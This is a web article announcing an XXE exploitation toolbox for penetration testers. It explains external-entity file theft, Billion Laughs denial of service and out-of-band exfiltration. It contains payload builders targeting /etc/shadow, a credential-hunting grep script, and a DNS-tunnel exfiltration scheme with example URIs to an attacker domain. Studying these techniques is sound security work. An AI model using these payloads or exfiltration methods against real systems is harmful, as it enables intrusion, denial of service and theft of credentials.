[ Beneath the Waves ]

On The Outside, Reaching In

article by Ben Lincoln


This article describes security testing-related software whose use may be restricted or prohibited in your place of residence or your workplace. The penalties for violating laws and regulations regarding security testing-related tools can be severe. Ensuring that you are allowed to use this software is your responsibility.

The software described is a "preview release" which is not yet feature-complete and which has not been tested on a variety of systems. Even if you are allowed to use the software, you should do so with caution, on systems which can be easily restored to their previous state if they are damaged.

Table of contents

  1. Introduction — what is On The Outside, Reaching In?
  2. XML (External) Entity Vulnerabilities
  3. Practical and Useful XXE Exploitation
  4. Current Modules
  5. Known Limitations
  6. Future Releases and Planned Features
  7. If You Would Like To Contribute
  8. Artwork and Historical Screenshots

Introduction — what is On The Outside, Reaching In?

XXE Vulnerability Exploitation
[ Figure: Basic XXE attack (McAfee ePO) ]
[ Figure: Advanced XXE attack (Mahara) ]

Certain versions of McAfee ePolicy Orchestrator are vulnerable to the most straightforward sort of XXE issue. In the first illustration, the attacking system causes an ePO dashboard to be created. Because of the XXE technique, the ePO server inserts the contents of its own db.properties file into the dashboard's description. The attacking system is then able to view the contents of that file by reading the description of the dashboard as displayed in the ePO web interface.
The second — much more complicated — series of diagrams illustrates the basic concept described by Timur Yunusov and Alexey Osipov in their whitepaper on out-of-band XXE techniques and the slides from the corresponding BlackHat EU 2013 presentation.
In short, the vulnerable Mahara CMS is tricked into sending the contents of a sensitive file to a malicious webserver acting on behalf of the attacker.
For more technical readers, the out-of-band data is generally base64-encoded — among other things, this allows for binary data to be retrieved.


On The Outside, Reaching In is a Python-based toolbox intended to allow useful exploitation of XML external entity ("XXE") vulnerabilities.

In the current release, it has two major functions:

  1. Read certain categories of file via the target system (either from the target's filesystem, or via HTTP calls to other systems accessible to the target).
  2. Trigger memory-exhaustion denial-of-service conditions in certain vulnerable targets.

In the future it may be extended to enable similar functionality for the general class of local and remote file-inclusion vulnerabilities. See Future Releases and Planned Features.

Conceptually, it is similar to the Metasploit Framework: it provides a package of related exploits built around a common core, so that new exploits of similar types can be developed quickly because so much of the code is reusable. The specifics of exploitation are significantly different, however.

XML (External) Entity Vulnerabilities

(This is a brief summary - for a detailed explanation, see OWASP's XML External Entity (XXE) Processing and Microsoft's XML Denial of Service Attacks and Defenses.)

XML (a widely-used — especially in so-called "enterprise" software — markup language) contains a feature called an "entity", which is basically a placeholder (or, for developers, a constant) that is defined once and then referenced later in the document. For example, if I am writing a boilerplate contract, I can define an entity named &companyname; with the value Spectre Security Products at the beginning of the document, and then use &companyname; wherever the contract would normally contain the actual company name (Spectre Security Products). When I have need for an identical contract for a different company (Universal Exports), I update the definition of &companyname; at the beginning of the document, and my work is finished.
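As a minimal sketch of the contract example above, the following uses Python's standard xml.etree.ElementTree module to parse a document that defines the entity once and references it twice. The element names (contract, party, clause) and the helper name render_contract are assumptions made up for illustration.

```python
import xml.etree.ElementTree as ET

# The entity is declared once in the internal DTD subset and then
# referenced wherever the company name should appear.
CONTRACT = """<?xml version="1.0"?>
<!DOCTYPE contract [
  <!ENTITY companyname "Spectre Security Products">
]>
<contract>
  <party>&companyname;</party>
  <clause>&companyname; agrees to the terms below.</clause>
</contract>"""


def render_contract(xml_text):
    """Parse the document and return the text of each child element.

    The parser performs entity expansion, so the returned strings
    contain the entity's value rather than the placeholder.
    """
    root = ET.fromstring(xml_text)
    return [element.text for element in root]


if __name__ == "__main__":
    for line in render_contract(CONTRACT):
        print(line)
    # Reusing the contract for another company only requires changing
    # the single entity definition.
    other = CONTRACT.replace("Spectre Security Products", "Universal Exports")
    for line in render_contract(other):
        print(line)
```

Changing the one definition is enough to update every reference, which is the whole appeal of the feature.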

This type of entity can be misused against several XML libraries to cause the target system to run out of memory. The specific techniques are commonly known as "Billion Laughs" and "Quadratic Blowup", and both are described in detail in the OWASP and Microsoft documents. I am generally uninterested in denial-of-service attacks, but included the capability in On The Outside, Reaching In because it was nearly "free" in terms of development effort and may be useful in certain cases.
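The arithmetic behind the "Billion Laughs" technique can be sketched as follows. Each entity level refers to the previous level several times, so the expanded size grows exponentially with the number of levels. This is an illustration with deliberately tiny parameters, not the code used by the tool; the function names and the entity names e0, e1, ... are assumptions.

```python
import xml.etree.ElementTree as ET


def build_nested_entities(levels, fanout, seed="lol"):
    """Build a document whose entity e<levels> expands to fanout**levels seeds."""
    declarations = ['<!ENTITY e0 "%s">' % seed]
    for level in range(1, levels + 1):
        # Each level is just `fanout` references to the level below it.
        refs = ("&e%d;" % (level - 1)) * fanout
        declarations.append('<!ENTITY e%d "%s">' % (level, refs))
    dtd = "\n  ".join(declarations)
    return "<!DOCTYPE d [\n  %s\n]>\n<d>&e%d;</d>" % (dtd, levels)


def expanded_length(levels, fanout, seed="lol"):
    """Number of characters the top-level entity expands to."""
    return len(seed) * fanout ** levels


if __name__ == "__main__":
    # Tiny, harmless parameters: 4**3 = 64 copies of "lol".
    document = build_nested_entities(levels=3, fanout=4)
    text = ET.fromstring(document).text
    print(len(document), "bytes of XML expand to", len(text), "characters")
    # Nine levels of ten references each would expand to billions of characters.
    print(expanded_length(levels=9, fanout=10))
```

The input document grows only linearly with the number of levels, which is why a few hundred bytes of XML can demand gigabytes of memory from a parser that expands entities without limits.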

Where XML entities become interesting (in my opinion) is that the specification also defines what's called an "external entity". As the name implies, this is a reference to information which is stored outside of the XML document. Perhaps the author wants to refer to an image or a table of data maintained by someone else, and this extension of the entity concept allows that to take place, rather than copying the information into the new document.

This aspect of the XML specification frequently results in behaviour which is unexpected by the developers using XML libraries, partly because XML has been used for so many types of application in the last 10+ years. Numerous web applications and services receive commands and requests formatted as XML documents. Many of them will internally parse the XML document (which, among other things, usually involves "entity expansion" - replacing the placeholders with the actual value defined for them) and then take action based on the parsed version of the data.

For example, perhaps I have written a web-based document library which allows content to be uploaded in the form of XML files. This library receives the files, resolves any entities, and then stores the result for viewing via web browser. But what if one of the entities is a reference to the external file /etc/shadow, and I have made the mistake of configuring the application to run as the root user? If I (the developer) have not designed my system with security in mind, the browsable version of the document now contains a list of all of the user accounts on the system and their password hashes. The first illustration above is of this type of scenario.
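To make the document-library scenario concrete, here is a minimal sketch of what such an uploaded document looks like. It only builds the XML text; nothing is parsed or sent anywhere. The function name, the default entity name ext, and the element names are assumptions for illustration, and a real target will expect its own document structure.

```python
def build_external_entity_document(uri, entity_name="ext"):
    """Return an XML document that declares one external entity and references it.

    A parser that resolves external entities will replace the reference in
    <body> with whatever content it retrieves from `uri`.
    """
    if '"' in uri:
        # The URI is placed inside a double-quoted system literal.
        raise ValueError("URI must not contain a double quote")
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE document [\n"
        '  <!ENTITY %s SYSTEM "%s">\n'
        "]>\n"
        "<document><body>&%s;</body></document>"
    ) % (entity_name, uri, entity_name)


if __name__ == "__main__":
    print(build_external_entity_document("file:///etc/shadow"))
```

The only difference from an ordinary entity is the SYSTEM keyword followed by a URI instead of a literal value. Whether the reference is actually resolved depends entirely on how the receiving XML library is configured.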

Nearly every XML library allows for this kind of inclusion of files by exact name. This is still very useful to an attacker, but requires the target file's path to be known or guessed. The Java XML library goes one step further and actually allows directory contents to be listed by the same means, so vulnerable applications written in Java can be used to obtain nearly all of the text-based files from the target system.

This type of vulnerability has been understood since 2002 or earlier, but is still surprisingly common — possibly because of the lack of useful automated tools for exploiting such vulnerabilities.

Some vulnerabilities require much more complicated techniques to exploit. The second illustration above shows the most elaborate method used by the initial release of On The Outside, Reaching In. It involves working together with an instance of She Wore A Mirrored Mask to perform Yunusov-Osipov-style data exfiltration[2].

Practical and Useful XXE Exploitation

Traditionally, XXE exploitation has generally involved single files (the most common example being /etc/passwd as a proof-of-concept of a vulnerability on a Linux or Unix system). While this can be very useful, I believe that realizing the full potential of XXE necessarily involves automation to obtain as many potentially-valuable files from the target system as possible.

In the case of Linux and Unix, the culture of that world is such that administrators will often put sensitive, valuable data in text files protected only by filesystem permissions:

  1. Database credentials and/or connection strings.
  2. SSH private keys.
  3. TLS/SSL certificates and their private keys.
  4. Lists of valid usernames.
  5. Configuration files.
  6. System information (from /proc).
  7. Information about installed software and other components (which may reveal vulnerabilities).

Even if the filesystem permissions are correct (which in my experience is rarely the case), if a PHP-based web application is running as a specific non-privileged account, that account will still almost always have read access to the file containing its own database connection information (including the password).

On The Outside, Reaching In provides the ability to take full advantage of this concept in the form of its --clone mode. Grab all the files you can, and then use grep or your favourite tool to search for information that will reveal further vulnerabilities.
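For the "search afterwards" step, grep is usually all that is needed, but the idea can also be sketched in Python. The example below walks a directory of retrieved files and flags lines that look like credentials or key material. The directory name cloned_files, the function name, and the three patterns are assumptions for illustration, not a description of the tool's output layout, and the patterns are far from exhaustive.

```python
import re
from pathlib import Path

# Illustrative patterns only; a real search would use a much longer list.
PATTERNS = {
    "password assignment": re.compile(r"(?i)(pass(word|wd)?|pwd)\s*[=:]\s*\S+"),
    "private key header": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "JDBC connection string": re.compile(r"jdbc:[a-z0-9]+:\S+", re.IGNORECASE),
}


def search_tree(root):
    """Return (path, line number, label) for every matching line under root."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        # Retrieved files may contain arbitrary bytes, so decode leniently.
        text = path.read_text(encoding="utf-8", errors="replace")
        for line_number, line in enumerate(text.splitlines(), start=1):
            for label, pattern in PATTERNS.items():
                if pattern.search(line):
                    hits.append((str(path), line_number, label))
    return hits


if __name__ == "__main__":
    for path, line_number, label in search_tree("cloned_files"):
        print("%s:%d: %s" % (path, line_number, label))
```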

Because XML external entities are referenced in the form of URIs, the potential exists not only to access content from the target server's filesystem, but also to use that target server as a reverse HTTP proxy into the environment that is hosting it (as well as any HTTP-based services running on the target server's loopback address or blocked from direct connectivity by a firewall). In other words, instead of specifying file:///etc/passwd for the external entity, imagine the possibilities for URIs like https://intranet.local/confidential/blueprints/DeathStar.dwg or ftp://ftp.local/bank_account_list.txt when those URIs are accessed not by the attacker's system (which hopefully has no network-level access to any of them), but by the exposed server with an XXE vulnerability, which sits on the same (hypothetical) network as those sensitive internal resources.

On The Outside, Reaching In can access intranet URIs of that type today, as long as the full paths are known. A feature is planned for a future release which would allow it to function as an HTTP proxy for web browsers and other HTTP-based pen-testing tools. This would allow interactive browsing and spidering of that content as well.

Current Modules

The current release of On The Outside, Reaching In includes the following modules:

Known Limitations

In the interest of making a potentially-useful tool available sooner rather than later, the current release of On The Outside, Reaching In is a preview which has significant missing functionality compared to the intended "feature-complete" alpha release of the shiny chrome-plated future:

In addition, each flavour of XML library as well as the vulnerable software introduces its own limitations on the capabilities of this type of tool.

See the documentation for individual modules for more details.

Future Releases and Planned Features

Some of the things I'd like to include in future releases (not in any particular order):

It would be tough to integrate into this particular tool (it would require the DNS equivalent of She Wore A Mirrored Mask, for one thing), but I like the idea of doing a combined XXE + DNS-tunneling data exfiltration. For example, the system that has the data does not have internet access of any kind, but it can make calls to a vulnerable Solr server which is allowed to perform DNS lookups against a DNS server which is configured in the standard way (i.e. it can make requests to DNS servers on the internet). The data is chunked and encoded as a series of base32 values of length 63 characters or less, which have a domain name belonging to the attacker appended (e.g. kle14l5a14a14355al55312qpbgah1355hgal55al515la5351la31bgl145a34.sll2454a52423524qbnau34labiweaalbuayk51i545bh14k3hb51w43kba145b.chunk000047.dnstunnel.reallycleverplan.com, etc.). Solr is made to attempt to load content from each of those domains (by using --exacturilist mode with a series of URIs like http://kle84l5a84a84375al75382qpbgah8357hgal57al785la7358la68bgl847a64.sll9474a79496794qbnau64labiweaalbuayk78i547bh84k6hb78w46kba847b.chunk000047.dnstunnel.reallycleverplan.com/do_not_care_if_this_exists_or_not.html, etc.). It doesn't have to succeed at loading the content (although getting an HTTP response of some kind instead of a timeout will make it run much faster), but just by performing the DNS lookup, it will cause the encoded data to be sent to the authoritative DNS server for the domain in question (which would be running the aforementioned DNS equivalent of She Wore A Mirrored Mask). The encoded data can then be re-assembled into the original file.
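The chunking and encoding step of that idea, along with the matching re-assembly, can be sketched in a few lines of Python. This is only an illustration of the name format described above and performs no DNS or HTTP activity. The function names, the 75-byte chunk size, the 60-character label width, and the placeholder domain dnstunnel.example.com are all assumptions; 75 bytes is chosen because it encodes to exactly 120 base32 characters, which splits into two labels that are under the 63-character DNS limit.

```python
import base64

BYTES_PER_CHUNK = 75   # 75 bytes encode to exactly 120 base32 characters
LABEL_WIDTH = 60       # stays under the 63-character limit for a DNS label


def encode_chunks(data, domain):
    """Turn data into a list of hostnames, one per chunk."""
    names = []
    for index, start in enumerate(range(0, len(data), BYTES_PER_CHUNK)):
        chunk = data[start:start + BYTES_PER_CHUNK]
        # "=" padding is not valid in a hostname, so strip it here
        # and restore it when decoding.
        encoded = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        labels = [encoded[i:i + LABEL_WIDTH]
                  for i in range(0, len(encoded), LABEL_WIDTH)]
        names.append(".".join(labels + ["chunk%06d" % index, domain]))
    return names


def decode_chunks(names, domain):
    """Re-assemble the original data from hostnames seen in any order."""
    suffix = "." + domain
    pieces = {}
    for name in names:
        if not name.endswith(suffix):
            raise ValueError("unexpected domain in " + name)
        parts = name[:-len(suffix)].split(".")
        labels, marker = parts[:-1], parts[-1]
        encoded = "".join(labels).upper()
        encoded += "=" * (-len(encoded) % 8)   # restore stripped padding
        pieces[int(marker[len("chunk"):])] = base64.b32decode(encoded)
    return b"".join(pieces[i] for i in sorted(pieces))


if __name__ == "__main__":
    names = encode_chunks(b"example file contents " * 10, "dnstunnel.example.com")
    for name in names:
        print(name)
    print(decode_chunks(names, "dnstunnel.example.com"))
```

Carrying the chunk number in its own label means the lookups can arrive out of order (or be repeated by resolvers) without affecting re-assembly.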

If You Would Like To Contribute

Please get in touch with me using the Contact form.

Artwork and Historical Screenshots

[ Screenshot of the highest-resolution banner ]
[ First successful out-of-band binary file download ]
[ Higher-resolution version of the icon/banner artwork (ANSI art version) ]
[ Higher-resolution version of the icon/banner artwork ]




File                         Size     Version  Release Date  Author
On The Outside, Reaching In  4 MiB    0.3      2014-07-20    Ben Lincoln
On The Outside, Reaching In  4 MiB    0.2.1    2014-06-22    Ben Lincoln
    Includes several lists for scraping /proc on Linux target systems.
On The Outside, Reaching In  343 KiB  0.2      2014-06-15    Ben Lincoln

1. Some of the diagrams on this page contain OpenOffice/LibreOffice Draw shapes created by Frank Ebert.
2. See the whitepaper by Timur Yunusov and Alexey Osipov and the slides from the corresponding BlackHat EU 2013 presentation - also by Timur Yunusov and Alexey Osipov.